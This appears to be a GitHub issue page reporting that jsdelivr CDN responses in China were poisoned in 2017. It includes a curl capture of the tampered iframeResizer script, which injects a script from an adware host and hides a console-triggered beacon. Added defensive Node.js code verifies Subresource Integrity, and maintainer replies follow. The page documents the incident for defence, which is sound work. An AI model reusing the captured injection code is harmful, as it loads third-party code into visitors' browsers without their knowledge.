
jsdelivr was poisoned, China 11-03-2017

$ curl https://cdn.jsdelivr.net/gh/davidjbradshaw/iframe-resizer@3.5.15/js/iframeResizer.min.js -v
*   Trying 101.66.227.63...
* TCP_NODELAY set
* Connected to cdn.jsdelivr.net (101.66.227.63) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* Cipher selection: ALL:!EXPORT:!EXPORT40:!EXPORT56:!aNULL:!LOW:!RC4:@STRENGTH
* successfully set certificate verify locations:
*   CAfile: /etc/ssl/cert.pem
  CApath: none
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Client hello (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS change cipher, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256
* ALPN, server accepted to use h2
* Server certificate:
*  subject: OU=Domain Control Validated; OU=PositiveSSL; CN=cdn.jsdelivr.net
*  start date: Apr 20 00:00:00 2014 GMT
*  expire date: Apr 19 23:59:59 2019 GMT
*  subjectAltName: host "cdn.jsdelivr.net" matched cert's "cdn.jsdelivr.net"
*  issuer: C=GB; ST=Greater Manchester; L=Salford; O=COMODO CA Limited; CN=COMODO RSA Domain Validation Secure Server CA
*  SSL certificate verify ok.
* Using HTTP2, server supports multi-use
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x7f9e9c00aa00)
> GET /gh/davidjbradshaw/iframe-resizer@3.5.15/js/iframeResizer.min.js HTTP/2
> Host: cdn.jsdelivr.net
> User-Agent: curl/7.54.0
> Accept: */*
>
* Connection state changed (MAX_CONCURRENT_STREAMS updated)!
< HTTP/2 200
< date: Thu, 02 Nov 2017 18:49:08 GMT
< content-type: application/x-javascript
< content-length: 682
< cache-control: max-age=604800
< age: 1
< x-via: 1.1 tongwangtong17:3 (Cdn Cache Server V2.0), 1.1 angtong122:10 (Cdn Cache Server V2.0)
<
* Connection #0 to host cdn.jsdelivr.net left intact
(function(){try{var e="_z__",t="http://cdn.jsdelivr.net//gh/davidjbradshaw/iframe-resizer@3.5.15/js/iframeResizer.min.js",r="http://xf.yellowto.com/?tsliese=27312832",c=document,n=c.currentScript,a=c.getElementsByTagName("head")[0],i=function(e,t){var r=c.createElement("script");r.type="text/javascript",t&&(r.id=t),r.src=e,a.appendChild(r)},s=setInterval(function(){var e=new Image,t=window.console;Object.defineProperty(e,"id",{get:function(){e.referrerPolicy="no-referrer",e.src="http://app.baidu.com/?d?",clearInterval(s)}}),t&&(t.log(e),t.clear())},2e3);c.getElementById(e)||self==top&&i(r,e),n&&(n.defer||n.async)?i(t):c.write('<script src="'+t+'"><\/script>')}catch(e){}})()%

The domain that appears there, “xf.yellowto.com”, is an adware website. Given that the request is via HTTPS, please allow me (the original post author) to guess:

  1. The jsdelivr team did this themselves,
  2. ChinaNetCenter (aka Wangsu in Chinese) did this (Quantil is a share held by ChinaNetCenter, and the CDN datacenter operation work actually belongs to ChinaNetCenter).
  3. The CDN-to-origin streaming uses an insecure protocol, such as HTTP not over TLS, and was poisoned by the China Cyber Army?

Original post: https://www.v2ex.com/t/403110
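
A check a site operator could run against a CDN response like the one captured above, as an added example that is not part of the original issue: it verifies the body against a pinned Subresource Integrity value and, on mismatch, lists hosts other than the expected CDN. The sample bodies, the `ads.example.test` host and all function names are constructed for illustration.

```javascript
const crypto = require('crypto');

const STRENGTH = { sha256: 1, sha384: 2, sha512: 3 };

// Integrity value ("sha384-<base64>") for a body you have reviewed and pinned.
function sriFor(body, alg = 'sha384') {
  return `${alg}-${crypto.createHash(alg).update(body).digest('base64')}`;
}

// Parse an integrity attribute and keep only the strongest algorithm listed,
// which is how browsers choose when several hashes are present.
function strongestHashes(integrity) {
  const parsed = integrity.trim().split(/\s+/)
    .map((tok) => tok.match(/^(sha256|sha384|sha512)-([A-Za-z0-9+/=]+)/))
    .filter(Boolean)
    .map((m) => ({ alg: m[1], digest: m[2] }));
  const best = Math.max(0, ...parsed.map((h) => STRENGTH[h.alg]));
  return parsed.filter((h) => STRENGTH[h.alg] === best);
}

// True only if the body matches a digest of the strongest listed algorithm.
// No usable hash means false here (stricter than a browser, by design).
function verifyIntegrity(body, integrity) {
  return strongestHashes(integrity).some((h) =>
    crypto.createHash(h.alg).update(body).digest('base64') === h.digest);
}

// Triage aid: hosts named in a mismatching body other than the expected CDN.
function foreignHosts(body, expectedHost) {
  const hosts = new Set();
  for (const m of body.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) {
    if (m[1].toLowerCase() !== expectedHost) hosts.add(m[1].toLowerCase());
  }
  return [...hosts].sort();
}

function checkResponse(body, integrity, expectedHost) {
  const ok = verifyIntegrity(body, integrity);
  return { ok, foreignHosts: ok ? [] : foreignHosts(body, expectedHost) };
}

// Constructed sample bodies (not the real library, not the captured payload).
const GOOD = '/* constructed stand-in for the pinned build */\nvar x=1;\n';
const TAMPERED = '(function(){var t="http://cdn.jsdelivr.net/lib.js",' +
  'r="http://ads.example.test/?id=1";})()';
const PINNED = sriFor(GOOD);

console.log(checkResponse(GOOD, PINNED, 'cdn.jsdelivr.net'));
console.log(checkResponse(TAMPERED, PINNED, 'cdn.jsdelivr.net'));
```

The same `sha384-…` value placed in a `<script integrity="…" crossorigin="anonymous">` tag makes the browser refuse a modified file regardless of which CDN node served it.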

Issue Analytics

  • State: closed
  • Created 6 years ago
  • Comments: 18 (8 by maintainers)

Top GitHub Comments

2 reactions
jimaek commented, Nov 2, 2017

I know that. I am waiting for an answer from Quantil first to decide what to do next. I have not confirmed anything yet. I switched to Cloudflare as a precaution.

I will keep you posted.

1 reaction
jimaek commented, Nov 9, 2017

Quantil was enabled again in China. Origin -> Quantil communication is encrypted too.
